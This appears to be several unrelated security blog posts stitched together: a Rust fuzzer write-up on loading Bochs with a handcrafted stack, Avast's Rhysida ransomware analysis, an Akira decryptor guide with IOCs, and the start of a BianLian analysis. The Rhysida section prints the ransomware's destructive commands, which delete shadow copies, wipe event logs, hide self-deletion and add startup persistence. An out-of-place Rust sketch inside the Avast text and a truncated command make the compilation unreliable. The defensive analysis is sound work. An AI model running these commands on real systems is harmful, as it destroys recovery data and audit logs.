The keys are on the left and the values are on the right. For instance, on the stack we can expect the key 0x5 for AT_PHNUM, which describes the number of Program Headers, to be accompanied by 12 as the value. We can dump the stack and see this in action as well.

gef➤  x/400gx $rsp
0x7fffffffe0b0:	0x0000000000000001	0x00007fffffffe3d6
0x7fffffffe0c0:	0x0000000000000000	0x00007fffffffe3ec
0x7fffffffe0d0:	0x00007fffffffe3fc	0x00007fffffffe44e
0x7fffffffe0e0:	0x00007fffffffe461	0x00007fffffffe475
0x7fffffffe0f0:	0x00007fffffffe4a2	0x00007fffffffe4b9
0x7fffffffe100:	0x00007fffffffe4e5	0x00007fffffffe505
0x7fffffffe110:	0x00007fffffffe52e	0x00007fffffffe542
0x7fffffffe120:	0x00007fffffffe559	0x00007fffffffe56c
0x7fffffffe130:	0x00007fffffffe588	0x00007fffffffe59d
0x7fffffffe140:	0x00007fffffffe5b8	0x00007fffffffe5c5
0x7fffffffe150:	0x00007fffffffe5da	0x00007fffffffe60e
0x7fffffffe160:	0x00007fffffffe61d	0x00007fffffffe646
0x7fffffffe170:	0x00007fffffffe667	0x00007fffffffe674
0x7fffffffe180:	0x00007fffffffe67d	0x00007fffffffe68d
0x7fffffffe190:	0x00007fffffffe69b	0x00007fffffffe6ad
0x7fffffffe1a0:	0x00007fffffffe6be	0x00007fffffffeca0
0x7fffffffe1b0:	0x00007fffffffecc1	0x00007fffffffeccd
0x7fffffffe1c0:	0x00007fffffffecde	0x00007fffffffed34
0x7fffffffe1d0:	0x00007fffffffed63	0x00007fffffffed73
0x7fffffffe1e0:	0x00007fffffffed8b	0x00007fffffffedad
0x7fffffffe1f0:	0x00007fffffffedc4	0x00007fffffffedd8
0x7fffffffe200:	0x00007fffffffedf8	0x00007fffffffee02
0x7fffffffe210:	0x00007fffffffee21	0x00007fffffffee2c
0x7fffffffe220:	0x00007fffffffee34	0x00007fffffffee46
0x7fffffffe230:	0x00007fffffffee65	0x00007fffffffee7c
0x7fffffffe240:	0x00007fffffffeed1	0x00007fffffffef7b
0x7fffffffe250:	0x00007fffffffef8d	0x00007fffffffefc3
0x7fffffffe260:	0x0000000000000000	0x0000000000000021
0x7fffffffe270:	0x00007ffff7f2e000	0x0000000000000033
0x7fffffffe280:	0x0000000000000e30	0x0000000000000010
0x7fffffffe290:	0x000000001f8bfbff	0x0000000000000006
0x7fffffffe2a0:	0x0000000000001000	0x0000000000000011
0x7fffffffe2b0:	0x0000000000000064	0x0000000000000003
0x7fffffffe2c0:	0x00007ffff7f30040	0x0000000000000004
0x7fffffffe2d0:	0x0000000000000038	0x0000000000000005
0x7fffffffe2e0:	0x000000000000000c	0x0000000000000007

You can see that towards the end of the data, at 0x7fffffffe2d8, we have the key 0x5, and at 0x7fffffffe2e0 we have the value 0xc, which is 12 in hex. We need some of these in order to load our ELF properly, as the ELF _start routine requires some of them to set the environment up properly. The ones I included on my stack were the following (they might not all be necessary):

  • AT_ENTRY which holds the program entry point,
  • AT_PHDR which is a pointer to the program header data,
  • AT_PHNUM which is the number of program headers,
  • AT_RANDOM which is a pointer to 16-bytes of a random seed, which is supposed to be placed by the kernel. This 16-byte value serves as an RNG seed to construct stack canary values. I found out that the program we load actually does need this information because I ended up with a NULL-ptr deref during my initial testing and then placed this auxp pair with a value of 0x4141414141414141 and ended up crashing trying to access that address. For our purposes, we don't really care that the stack canary values are cryptographically secure, so I just placed another pointer to the program entry as that is guaranteed to exist.
  • AT_NULL which is used to terminate the auxiliary vector

So with those values all accounted for, we now know all of the data we need to construct the program’s stack.

Allocating the Stack

First, we need to allocate memory to hold the Bochs stack since we will need to know the address it’s mapped at in order to formulate our pointers. We will know offsets within a vector representing the stack data, but we won’t know what the absolute addresses are unless we know ahead of time where this stack is going in memory. Allocating the stack was very straightforward as I just used mmap the same way we did with the program segments. Right now I’m using a 1MB stack which seems to be large enough.
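
A minimal sketch of that allocation follows; the STACK_SIZE constant and the function name are mine, and the real code may differ slightly (for example, in the flags it passes):

// 1MB stack, as mentioned above
const STACK_SIZE: usize = 0x100000;

// Map an anonymous, writable region to act as the Bochs stack; this mirrors
// what we did with `mmap` for the loadable program segments
fn allocate_stack() -> Result<usize, LucidErr> {
    let result = unsafe {
        libc::mmap(
            std::ptr::null_mut(),               // let the kernel pick the address
            STACK_SIZE as libc::size_t,
            libc::PROT_READ | libc::PROT_WRITE, // the stack must be readable/writable
            libc::MAP_ANONYMOUS | libc::MAP_PRIVATE,
            -1 as libc::c_int,                  // no backing file
            0 as libc::off_t,
        )
    };

    if result == libc::MAP_FAILED {
        return Err(LucidErr::from("Failed to `mmap` memory for the stack"));
    }

    Ok(result as usize)
}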

Constructing the Stack Data

In my stack creation logic, I created the stack starting from the bottom and then inserting values on top of the stack.

So the first value we place onto the stack is the “end-marker” from the diagram which is just a 0u64 in Rust.

Next, we need to place all of the strings we need onto the stack, namely our command line arguments. To separate command line arguments meant for the fuzzer from command line arguments meant for Bochs, I created a command line argument --bochs-args which is meant to serve as a delineation point between the two argument categories. Every argument after --bochs-args is meant for Bochs. I iterate through all of the command line arguments provided and then place them onto the stack. I also log the length of each string argument so that later on, we can calculate their absolute address for when we need to place pointers to the strings in the argv vector. As a sidenote, I also made sure that we maintained 8-byte alignment throughout the string pushing routine just so we didn’t have to deal with any weird pointer values. This isn’t necessary but makes the stack state easier for me to reason about. This is performed with the following logic:

// Create a vector to hold all of our stack data
let mut stack_data = Vec::new();

// Add the "end-marker" NULL, we're skipping adding any envvar strings for
// now
push_u64(&mut stack_data, 0u64);

// Parse the argv entries for Bochs
let args = parse_bochs_args();

// Store the length of the strings including padding
let mut arg_lens = Vec::new();

// For each argument, push a string onto the stack and store its offset 
// location
for arg in args.iter() {
    let old_len = stack_data.len();
    push_string(&mut stack_data, arg.to_string());

    // Calculate arg length and store it
    let arg_len = stack_data.len() - old_len;
    arg_lens.push(arg_len);
}

Pushing strings is performed like this:

// Pushes a NULL terminated string onto the "stack" and pads the string with 
// NULL bytes until we achieve 8-byte alignment
fn push_string(stack: &mut Vec<u8>, string: String) {
    // Convert the string to bytes and append it to the stack
    let mut bytes = string.as_bytes().to_vec();

    // Add a NULL terminator
    bytes.push(0x0);

    // We're adding bytes in reverse because we're adding to index 0 always,
    // we want to pad these strings so that they remain 8-byte aligned so that
    // the stack is easier to reason about imo
    if bytes.len() % U64_SIZE > 0 {
        let pad = U64_SIZE - (bytes.len() % U64_SIZE);
        for _ in 0..pad { bytes.push(0x0); }
    }

    for &byte in bytes.iter().rev() {
        stack.insert(0, byte);
    }
}
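
The push_u64 helper used throughout these snippets isn't shown above; a minimal version consistent with how push_string builds the stack (always inserting at index 0, little-endian) would be:

// Pushes a u64 onto the "stack" vector; like push_string, we insert at index 0
// so the most recently pushed value always ends up at the top (lowest offset)
fn push_u64(stack: &mut Vec<u8>, value: u64) {
    let bytes = value.to_le_bytes();

    for &byte in bytes.iter().rev() {
        stack.insert(0, byte);
    }
}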

Then we add some padding and the auxiliary vector members:

// Add some padding
push_u64(&mut stack_data, 0u64);

// Next we need to set up the auxiliary vectors, terminate the vector with
// the AT_NULL key which is 0, with a value of 0
push_u64(&mut stack_data, 0u64);
push_u64(&mut stack_data, 0u64);

// Add the AT_ENTRY key which is 9, along with the value from the Elf header
// for the program's entry point. We need to calculate the absolute entry
// address by adding the load base
push_u64(&mut stack_data, elf.elf_header.entry + base as u64);
push_u64(&mut stack_data, 9u64);

// Add the AT_PHDR key which is 3, along with the address of the program
// headers which is just ELF_HDR_SIZE away from the base
push_u64(&mut stack_data, (base + ELF_HDR_SIZE) as u64);
push_u64(&mut stack_data, 3u64);

// Add the AT_PHNUM key which is 5, along with the number of program headers
push_u64(&mut stack_data, elf.program_headers.len() as u64);
push_u64(&mut stack_data, 5u64);

// Add AT_RANDOM key which is 25, this is where the start routines will 
// expect 16 bytes of random data as a seed to generate stack canaries, we
// can just use the entry again since we don't care about security
push_u64(&mut stack_data, elf.elf_header.entry + base as u64);
push_u64(&mut stack_data, 25u64);

Then, since we ignored the environment variables, we just push a NULL pointer onto the stack and also the NULL pointer terminating the argv vector:

// Since we skipped envvars for now, envp[0] is going to be NULL
push_u64(&mut stack_data, 0u64);

// argv[n] is a NULL
push_u64(&mut stack_data, 0u64);

This is where I spent a lot of time debugging. We now have to add the pointers to our arguments. To do this, I first calculated the total length of the stack data now that we know all of the variable parts like the number of arguments and the length of all the strings. We have the stack length as it currently exists which includes the strings, and we know how many pointers and members we have left to add to the stack (number of args and argc). Since we know this, we can calculate the absolute addresses of where the string data will be as we push the argv pointers onto the stack. We calculate the length as follows:

// At this point, we have all the information we need to calculate the total
// length of the stack. We're missing the argv pointers and finally argc
let mut stack_length = stack_data.len();

// Add argv pointers
stack_length += args.len() * POINTER_SIZE;

// Add argc
stack_length += std::mem::size_of::<u64>();

Next, we start at the bottom of the stack and create a movable offset which will track through the stack stopping at the beginning of each string so that we can calculate its absolute address. The offset represents how deep into the stack from the top we are. At first, the offset is the largest value it can be because it’s at the bottom of the stack (higher-memory address). We subtract from it in order to point us towards the beginning of each argv string we pushed onto the stack. So the bottom of the stack looks something like this:

NULL
string_1
string_2
end-marker <--- offset

So armed with the arguments and their lengths that we recorded, we can adjust the offset each time we iterate through the argument lengths to point to the beginning of the strings. There is one gotcha though, on the first iteration, we have to account for the end-marker and its 8-bytes. So this is how the logic goes:

// Right now our offset is at the bottom of the stack, for the first
// argument calculation, we have to accommodate the "end-marker" that we added
// to the stack at the beginning. So we need to move the offset up the size
// of the end-marker and then the size of the argument itself. After that,
// we only have to accommodate the argument lengths when moving the offset
for (idx, arg_len) in arg_lens.iter().enumerate() {
    // First argument, account for end-marker
    if idx == 0 {
        curr_offset -= arg_len + U64_SIZE;
    }
    
    // Not the first argument, just account for the string length
    else {
        curr_offset -= arg_len;
    }
    
    // Calculate the absolute address
    let absolute_addr = (stack_addr + curr_offset) as u64;

    // Push the absolute address onto the stack
    push_u64(&mut stack_data, absolute_addr);
}

It’s pretty cool! And it seems to work? Finally we cap the stack off with argc and we are done populating all of the stack data in a vector. Next, we’ll want to actually copy the data onto the stack allocation which is straightforward so no code snippet there.

The last piece of information I think worth noting here is that I created a constant called STACK_DATA_MAX, and the length of the stack data cannot be more than that tunable value. We use this value to set up RSP when we jump to the program in memory and start executing. RSP is set so that it is at the absolute lowest address possible, which is the stack allocation base plus (stack allocation size - STACK_DATA_MAX). This way, when the stack grows, we have left the maximum amount of slack space possible for the stack to grow into, since the stack grows down in memory.
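
For completeness, a sketch of that final capping-and-copying step might look something like the function below. The dst parameter stands in for wherever in the allocation the top of the crafted stack is placed (which is also where RSP will point so that [RSP] holds argc); I'm not reproducing the repo's exact address math here:

// Cap the stack data off with argc and copy the finished vector into the
// stack allocation. `dst` is the address the crafted stack data should start
// at; RSP is pointed here when we jump to the program. (Sketch only.)
fn finalize_stack(stack_data: &mut Vec<u8>, num_args: usize, dst: usize) {
    // argc goes on last so it ends up at the very top of the stack
    push_u64(stack_data, num_args as u64);

    unsafe {
        std::ptr::copy_nonoverlapping(
            stack_data.as_ptr(),
            dst as *mut u8,
            stack_data.len(),
        );
    }
}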

Executing the Loaded Program

Everything at this point should be set up perfectly in memory and all we have to do is jump to the target code and start executing. For now, I haven't fleshed out a context switching routine or anything; we're literally just going to jump to the program, execute it, and hope everything goes well. The code I used to achieve this is very simple:

pub fn start_bochs(bochs: Bochs) {
    // Set RAX to our jump destination which is the program entry, clear RDX,
    // and set RSP to the correct value
    unsafe {
        asm!(
            "mov rax, {0}",
            "mov rsp, {1}",
            "xor rdx, rdx",
            "jmp rax",
            in(reg) bochs.entry,
            in(reg) bochs.rsp,
        );
    }
}

The reason we clear RDX is because if the _start routine sees a non-zero value in RDX, it will interpret that to mean that we are attempting to register a hook located at the address in RDX to be invoked when the program exits, we don’t have one we want to run so for now we NULL it out. The other register values don’t really matter. We move the program entry point into RAX and use it as a long jump target and we supply our handcrafted RSP so that the program has a stack to use to do its relocations and run properly.

dude@lol:~/lucid/target/release$ ./lucid --bochs-args -AAAAA -BBBBBBBBBB
[17:43:19] lucid> Loading Bochs...
[17:43:19] lucid> Bochs loaded { Entry: 0x19F50, RSP: 0x7F513F11C000 }
Argument count: 3
Args:
   -./bochs
   --AAAAA
   --BBBBBBBBBB
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
dude@lol:~/lucid/target/release$ 

The program runs, parses our command line args, and exits all without crashing! So it looks like everything is good to go. This would normally be a good stopping place, but I was morbidly curious…

Will Bochs Run?

We have to see right? First we have to compile Bochs as a -static-pie ELF which was a headache in itself, but I was able to figure it out.

dude@lol:~/lucid/target/release$ ./lucid --bochs-args -AAAAA -BBBBBBBBBB
[12:30:40] lucid> Loading Bochs...
[12:30:40] lucid> Bochs loaded { Entry: 0xA3DB0, RSP: 0x7FEB0F565000 }
========================================================================
                        Bochs x86 Emulator 2.7
              Built from SVN snapshot on August  1, 2021
                Timestamp: Sun Aug  1 10:07:00 CEST 2021
========================================================================
Usage: bochs [flags] [bochsrc options]

  -n               no configuration file
  -f configfile    specify configuration file
  -q               quick start (skip configuration interface)
  -benchmark N     run Bochs in benchmark mode for N millions of emulated ticks
  -dumpstats N     dump Bochs stats every N millions of emulated ticks
  -r path          restore the Bochs state from path
  -log filename    specify Bochs log file name
  -unlock          unlock Bochs images leftover from previous session
  --help           display this help and exit
  --help features  display available features / devices and exit
  --help cpu       display supported CPU models and exit

For information on Bochs configuration file arguments, see the
bochsrc section in the user documentation or the man page of bochsrc.
00000000000p[      ] >>PANIC<< command line arg '-AAAAA' was not understood
00000000000e[SIM   ] notify called, but no bxevent_callback function is registered
========================================================================
Bochs is exiting with the following message:
[      ] command line arg '-AAAAA' was not understood
========================================================================
00000000000i[SIM   ] quit_sim called with exit code 1

Bochs runs! It couldn’t make sense of our non-sense command line arguments, but we loaded it and ran it successfully.

Next Steps

The very next step and blog post will be developing a context-switching routine that we will use to transition between Fuzzer execution and Bochs execution. This will involve saving our state each time and will function basically the same way a normal user-to-kernel context switch does.

After that, we have to get very familiar with Bochs and attempt to get a target up and running in vanilla Bochs. Once we do that, we’ll try to run that in the Fuzzer.

Resources

  • I used this excellent blogpost from Faster Than Lime a lot when learning about how to load ELFs in memory: https://fasterthanli.me/series/making-our-own-executable-packer/part-17.
  • Also shoutout @netspooky for helping me understand the stack layout!
  • Thank you to ChatGPT as well, for being my sounding board (even if you failed to help me with my stack creation bugs)

Code

https://github.com/h0mbre/Lucid

Rhysida Ransomware Technical Analysis

Rhysida is a new ransomware strain that emerged in the second quarter of 2023. The first mention of the Rhysida ransomware was in May 2023 by MalwareHunterTeam (sample’s timestamp is May 16, 2023). As of Oct 12, the ransomware’s leak site contains a list of over 50 attacked organizations of all types, including government, healthcare, and IT.

Screenshot of the Rhysida data leak site as of Oct 16, 2023 

Victims of the Rhysida ransomware can contact Avast experts directly at decryptors-at-avast-dot-com for a free consultation about how to mitigate damage caused by the attack. 

Analysis of the Rhysida encryptor 

The Rhysida encryptor comes as a 32-bit or 64-bit Windows PE file, compiled by MinGW GNU version 6.3.0 and linked by the GNU linker v 2.30. The first public version comes as a debug version, which makes its analysis easier. 

For cryptographic operations, Rhysida uses the LibTomCrypt library version 1.18.1. For multi-threaded and synchronization operations, Rhysida uses the winpthreads library. A ChaCha20-based pseudo-random number generator is used for generating random numbers, such as the AES encryption key, the AES initialization vector, and the random padding for RSA-OAEP encryption. The public RSA key is hard-coded in the binary (ASN1-encoded) and loaded using the rsa_import function. Each sample has a different embedded RSA key.

The encryptor executable supports the following command line arguments: 

  • -d Specifies a directory name to encrypt. If omitted, all drives (identified by letters) are encrypted 
  • -sr Enables self-remove after file encryption 
  • -nobg Disables setting desktop background 
  • -S When present, Rhysida will create a scheduled task, executing at OS startup under the System account 
  • -md5 When present, Rhysida will calculate MD5 hash of each file before it is encrypted. However, this feature is not fully implemented yet – the MD5 is calculated, but it’s not used anywhere later. 

When executed, the encryptor queries the number of processors in the system. This value serves for: 

  • Allocating random number generators (one per processor) 
  • Creating Encryptor threads (one per processor) 

Initialization for multi-threaded encryption

Furthermore, Rhysida creates a File Enumerator thread, which searches all available disk drives by letter. Binaries prior July 2023 enumerate drives in normal order (from A: to Z:); binaries built after July 1st enumerate drives in reverse order (from Z: to A:). 

The File Enumerator thread searches for files to encrypt and puts them into a synchronized list, ready to be picked by one of the Encryptor threads. Files in system critical folders, and files necessary to run operating systems and programs, are excluded from encryption. 
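
Conceptually, this is a standard producer/consumer setup: one enumerator thread feeding a shared, lock-protected list that per-CPU encryptor threads drain. Purely as an illustration of that pattern (Rhysida itself is C/C++ code using winpthreads, not Rust), a minimal sketch could look like this:

use std::collections::VecDeque;
use std::sync::{Arc, Condvar, Mutex};
use std::thread;

fn main() {
    // Synchronized work list shared between the enumerator and the encryptors
    let queue = Arc::new((Mutex::new(VecDeque::<Option<String>>::new()), Condvar::new()));

    // One "Encryptor" worker per processor, mirroring Rhysida's design
    let n_workers = thread::available_parallelism().map(|n| n.get()).unwrap_or(1);
    let workers: Vec<_> = (0..n_workers)
        .map(|_| {
            let queue = Arc::clone(&queue);
            thread::spawn(move || loop {
                let (lock, cvar) = &*queue;
                let mut list = lock.lock().unwrap();
                while list.is_empty() {
                    list = cvar.wait(list).unwrap();
                }
                match list.pop_front().unwrap() {
                    Some(path) => println!("would encrypt {path}"), // encryption happens here
                    None => break, // shutdown marker from the enumerator
                }
            })
        })
        .collect();

    // The "File Enumerator" side: walk the drives and feed the list; here we
    // just push a couple of fake paths plus one shutdown marker per worker
    {
        let (lock, cvar) = &*queue;
        let mut list = lock.lock().unwrap();
        list.push_back(Some("C:/Users/Public/example.docx".to_string()));
        list.push_back(Some("D:/data/report.xlsx".to_string()));
        for _ in 0..n_workers {
            list.push_back(None);
        }
        cvar.notify_all();
    }

    for w in workers {
        let _ = w.join();
    }
}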

List of skipped directories: 

  • /$Recycle.Bin 
  • /Boot 
  • /Documents and Settings 
  • /PerfLogs 
  • /Program Files 
  • /Program Files (x86)
  • /ProgramData 
  • /Recovery 
  • /System Volume Information  
  • /Windows 
  • /$RECYCLE.BIN

List of skipped file types:

  • .bat 
  • .bin 
  • .cab 
  • .cd 
  • .com 
  • .cur 
  • .dagaba 
  • .diagcfg 
  • .diagpkg 
  • .drv 
  • .dll 
  • .exe 
  • .hlp 
  • .hta 
  • .ico 
  • .lnk 
  • .msi 
  • .ocx
  • .ps1 
  • .psm1 
  • .scr 
  • .sys 
  • .ini 
  • Thumbs.db 
  • .url 
  • .iso 

Additionally, the ransom note file, usually named CriticalBreachDetected.pdf, is excluded from the list of encrypted files. The PDF content of the ransom note file is hard-coded in the binary and is dropped into each folder. The following picture shows an example of the ransom note from a September version of the ransomware:

In addition to dropping the ransom note, if enabled in the configuration, Rhysida generates a JPEG picture, which is stored in C:/Users/Public/bg.jpg. Earlier versions of the ransomware generated the image with unwanted artifacts, which was fixed in later builds of Rhysida. The following picture shows an example of such a JPEG picture:

The picture is set as the desktop background on the infected device. For that purpose, a set of calls to an external process via system (a C equivalent of CreateProcess) is used: 

Rhysida may or may not (depending on the configuration and binary version) execute additional actions, including: 
 

  • Delete shadow copies using: 
     
    cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet 
     
  • Delete the event logs with this command: 
     
    cmd.exe /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
  • Delete itself via Powershell command 
     
    cmd.exe /c start powershell.exe -WindowStyle Hidden -Command Sleep -Milliseconds 500; Remove-Item -Force -Path "%BINARY_NAME%" -ErrorAction SilentlyContinue;
     
  • (Re-)create scheduled task on Windows startup: 
     
    cmd.exe /c start powershell.exe -WindowStyle Hidden -Command "Sleep -Milliseconds 1000; schtasks /end /tn Rhsd; schtasks /delete /tn Rhsd /f; schtasks /create /sc ONSTART /tn Rhsd /tr \"
     
  • Remove scheduled task using: 
     
    cmd.exe /c start powershell.exe -WindowStyle Hidden -Command "Sleep -Milliseconds 1000; schtasks /delete /tn Rhsd /f;" 

How Rhysida encrypts files 

To achieve the highest possible encryption speed, Rhysida’s encryption is performed by multiple Encryptor threads. Files bigger than 1 MB (1048576 bytes) are divided to 2-4 blocks and only 1 MB of data is encrypted from each block. The following table shows an overview of the number of blocks, size of one block and length of the encrypted part: 

File Size | Block Count | Block Size    | Encrypted Length
0 – 1 MB  | 1           | (whole file)  | (whole block)
1 – 2 MB  | 1           | (whole file)  | 1048576
2 – 3 MB  | 2           | File Size / 2 | 1048576
3 – 4 MB  | 3           | File Size / 3 | 1048576
> 4 MB    | 4           | File Size / 4 | 1048576

Table 1: File sizes, block counts, block lengths and encrypted lengths.
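
As a quick illustration of Table 1, the per-file parameters could be derived like this (a sketch of the table's logic only, not Rhysida's actual code; the exact boundary handling is an assumption):

const MEGABYTE: u64 = 1048576;

// Returns (block_count, block_size, encrypted_length) per Table 1
fn block_params(file_size: u64) -> (u64, u64, u64) {
    if file_size <= MEGABYTE {
        // Small files: a single block, encrypted in full
        (1, file_size, file_size)
    } else if file_size <= 2 * MEGABYTE {
        // 1-2 MB: one block, only the first 1 MB of it is encrypted
        (1, file_size, MEGABYTE)
    } else if file_size <= 3 * MEGABYTE {
        (2, file_size / 2, MEGABYTE)
    } else if file_size <= 4 * MEGABYTE {
        (3, file_size / 3, MEGABYTE)
    } else {
        (4, file_size / 4, MEGABYTE)
    }
}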

Multiple steps are performed to encrypt a file: 

  • The file is renamed to have the “.rhysida” extension. 
  • The file size is obtained by the sequence below. Note that earlier versions of the ransomware contain a bug, which causes the upper 32 bits of the file size to be ignored. In later versions of Rhysida, this bug is fixed. 
  • Based on the file size, Rhysida calculates counts and length shown in Table 1. 
  • A 32-byte file encryption key and a 16-byte initialization vector for the AES-256 stream cipher are generated using the random number generator associated with the Encryptor thread.
  • Files are encrypted using AES-256 in CTR mode.
  • Both file encryption key and the IV are encrypted by RSA-4096 with OAEP padding and stored to the file tail structure. 
  • This file tail is appended to the end of the encrypted file: 

Conclusion 

Rhysida is a relatively new ransomware, but it already has a long list of attacked organizations. As of October 2023, it is still in active development.

Victims of the Rhysida ransomware may contact us at decryptors-at-avast-dot-com for a consultation about how to mitigate damage caused by the attack. 

The post Rhysida Ransomware Technical Analysis appeared first on Avast Threat Labs.

Decrypted: Akira Ransomware

Researchers for Avast have developed a decryptor for the Akira ransomware and released it for public download. The Akira ransomware appeared in March 2023 and since then, the gang claims successful attacks on various organizations in the education, finance and real estate industries, amongst others.

Skip to how to use the Akira Ransomware Decryptor

Note that this ransomware is not related to the Akira ransomware discovered by Karsten Hahn in 2017 and our decryptor cannot be used to decrypt files from this old variant.

The Akira ransomware comes as a 64-bit Windows PE binary. It is written in C++ with heavy support from C++ libraries. Additionally, the Boost library was used to implement the asynchronous encryption code. The binary is linked by Microsoft Linker version 14.35.

In June 2023, a security researcher rivitna published a sample that is compiled for Linux. The Linux version is 64-bit and uses the Boost library. 

Akira Encryption Schema 

During the run, the ransomware generates a symmetric encryption key using CryptGenRandom(), which is the random number generator implemented by Windows CryptoAPI. Files are encrypted by Chacha 2008 (D. J. Bernstein’s implementation).  

The symmetric key is encrypted by the RSA-4096 cipher and appended to the end of the encrypted file. The public key is hardcoded in the ransomware binary and differs per sample.

Exclusion List 

When searching files for encryption, Akira is not especially fussy. Whilst ransomware strains usually have a list of file types to encrypt, Akira has a list of files not to encrypt: 

  • .exe 
  • .dll 
  • .lnk 
  • .sys 
  • .msi 
  • akira_readme.txt 

Furthermore, there are folders that are always ignored by Akira: 

  • winnt 
  • temp 
  • thumb
  • $Recycle.Bin 
  • $RECYCLE.BIN 
  • System Volume Information 
  • Boot 
  • Windows 
  • Trend Micro 

There is even the legacy winnt folder, which was used as default folder for installation of Windows 2000. 

Encryption Schema for Small Files 

Files are encrypted depending on their size. For files of 2,000,000 bytes and smaller, the ransomware encrypts the first half of the file. The structure of such an encrypted file is as follows: 

Block type           Size
Encrypted Block      File Size / 2
Plain Text Block     File Size / 2
File Footer          534 bytes

Encryption Schema for Large Files

For file sizes greater than 2,000,000 bytes, Akira encrypts four blocks. First, the size of a full block is calculated (see Figure 1).

Figure 1: Akira’s calculation of full encryption block size.

The size of the encrypted part of the block is then calculated (see Figure 2).

Figure 2: Akira’s calculation of the size of encryption portion of block.

The layout of an encrypted file is then created (see Figure 3).

Block type           Size
Encrypted Block #1   EncryptedLength
Plain Text Block     BlockLength - EncryptedLength
Encrypted Block #2   EncryptedLength
Plain Text Block     BlockLength - EncryptedLength
Encrypted Block #3   EncryptedLength
Plain Text Block     BlockLength - EncryptedLength
Encrypted Block #4   EncryptedLength
Plain Text Block     Rest of the file
File Footer          534 bytes
Figure 3: Layout of encrypted file.

The structure of the file footer can be described by the following structure in C language:

Figure 4: File footer structure.

Encrypted files can be recognized by the extension .akira. A file named akira_readme.txt – the ransom note – is dropped in each folder (see Figure 5).

Figure 5: Akira ransom note file.

The ransom note mentions two TOR sites. In the first one (Figure 6), the user can list the hacked companies; in the second, victims are instructed on how to make payment (Figure 7).

Figure 6: TOR site listing and describing victim company.
Figure 7: Akira TOR site instructing victim on how to pay ransom.

Linux Version of Akira

The Linux version of the Akira ransomware works identically to its Windows counterpart. Encrypted files have the same extension and the same encryption schema. Obviously, Windows CryptoAPI is not available on Linux, so the ransomware authors used the Crypto++ library to cover the parts that are handled by CryptoAPI on Windows.

Our team is currently developing a Linux version of our decryptors. In the meantime, the Windows version of the decryptor can be used to decrypt files encrypted by the Linux version of the ransomware. Please use the WINE layer to run the decryptor under Linux.

Similarities to Conti

Akira has a few similarities to the Conti v2 ransomware, which may indicate that the malware authors were at least inspired by the leaked Conti sources. Commonalities include:

  1. List of file type exclusions. Akira ignores files with the same extensions as Conti, except that there’s akira_readme.txt instead of R3ADM3.txt.
  2. List of directory exclusions. Again, Akira ignores the same folders as Conti, including winnt and Trend Micro, which makes Trend Micro’s default installation folder especially resilient against both ransomware strains.
  3. The structure of the Akira file tail is equal to the file tail appended by Conti (see Figure 8).
Figure 8: Conti ransomware file tail.

The member variable bEncryptType is set to 0x24, 0x25, or 0x26 by Conti version 2; Akira uses 0x32.

  4. The implementation of ChaCha 2008 used by the Akira ransomware is the same as the one used by the Conti ransomware.
  5. The code for key generation (two calls to CryptGenRandom followed by CryptEncrypt) resembles Conti's key generation function.

How to use the Avast decryption tool to decrypt files encrypted by the ransomware

Please read the instructions carefully; the decryption success rate depends on it. If you don't like reading manuals, at least read the instructions about the file pair.

1. The first step is to download the decryptor binary. Avast provides a 64-bit decryptor, as the ransomware is also 64-bit and can't run on 32-bit Windows. If you have no choice but to use 32-bit applications, you may download the 32-bit decryptor here.

2. Run the executable file, preferably as an administrator. It starts as a wizard, leading you through the configuration of the decryption process.

3. On the initial page, we have a link to the license information. Click the Next button when you are ready to start.

4. On the next page, select the list of locations you want to be searched for and decrypted. By default, it has a list of all local drives:

5. On the following page, you need to supply an example of a file in its original form and then one encrypted by Akira ransomware. Type both names of the files. You can also drag & drop files from Windows Explorer to the wizard page.

It is extremely important to pick a pair of files that are as big as you can find. Due to Akira's block size calculation, there may be a dramatic difference in the size limit even for files that differ in size by a single byte.

When you click Next, the decryption tool will carefully examine the file pair and tell you what the biggest decryptable file is. In general, the size limit should be the same as the size of the original file:

6. The next page is where the password cracking process takes place. Click Start when you are ready to begin. This process usually only takes a few seconds but will require a large amount of system memory. This is why we strongly recommend using the 64-bit version of the decryption tool.

Once the password is found, you can continue to decrypt all the encrypted files on your PC by clicking Next.

7. On the final page, you can opt in to back up your encrypted files. These backups may help if anything goes wrong during the decryption process. This choice is selected by default, which we recommend. After clicking Decrypt, the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files.

For questions or comments about the Avast decryptor, email [email protected].

IOCs (indicators of compromise)

Windows versions

3c92bfc71004340ebc00146ced294bc94f49f6a5e212016ac05e7d10fcb3312c
5c62626731856fb5e669473b39ac3deb0052b32981863f8cf697ae01c80512e5
678ec8734367c7547794a604cc65e74a0f42320d85a6dce20c214e3b4536bb33
7b295a10d54c870d59fab3a83a8b983282f6250a0be9df581334eb93d53f3488
8631ac37f605daacf47095955837ec5abbd5e98c540ffd58bb9bf873b1685a50
1b6af2fbbc636180dd7bae825486ccc45e42aefbb304d5f83fafca4d637c13cc
9ca333b2e88ab35f608e447b0e3b821a6e04c4b0c76545177890fb16adcab163
d0510e1d89640c9650782e882fe3b9afba00303b126ec38fdc5f1c1484341959
6cadab96185dbe6f3a7b95cf2f97d6ac395785607baa6ed7bf363deeb59cc360

Linux version

1d3b5c650533d13c81e325972a912e3ff8776e36e18bca966dae50735f8ab296

The post Decrypted: Akira Ransomware appeared first on Avast Threat Labs.

Decrypted: BianLian Ransomware

The team at Avast has developed a decryptor for the BianLian ransomware and released it for public download. The BianLian ransomware emerged in August 2022, performing targeted attacks in various industries, such as the media and entertainment, manufacturing and healthcare sectors, and raised the threat bar by encrypting files at high speeds.

Skip to how to use the BianLian ransomware decryptor

Static analysis of BianLian ransomware 

BianLian is a ransomware strain written in the Go language and compiled as a 64-bit Windows executable. Due to the nature of the Go language, there are many strings directly visible in the binary, including details about the directory structure of the author's PC. 

There are references to asymmetric cryptography libraries in the sample (RSA and elliptic curves), but the ransomware doesn't actually use any of them. File data is encrypted with AES-256 in CBC mode. The length of the encrypted data is aligned to 16 bytes, as required by the AES CBC cipher. 

BianLian ransomware behavior 

Upon its execution, BianLian searches all available disk drives (from A: to Z:). For every drive found, it searches all files and encrypts every file whose extension matches one of the 1013 extensions hardcoded in the ransomware binary. 

Interestingly enough, the ransomware doesn't encrypt files from the start, nor does it encrypt them to the end. Instead, there is a fixed file offset hardcoded in the binary from which the encryption proceeds. The offset differs per sample, but none of the known samples encrypts data from the start of the file. 

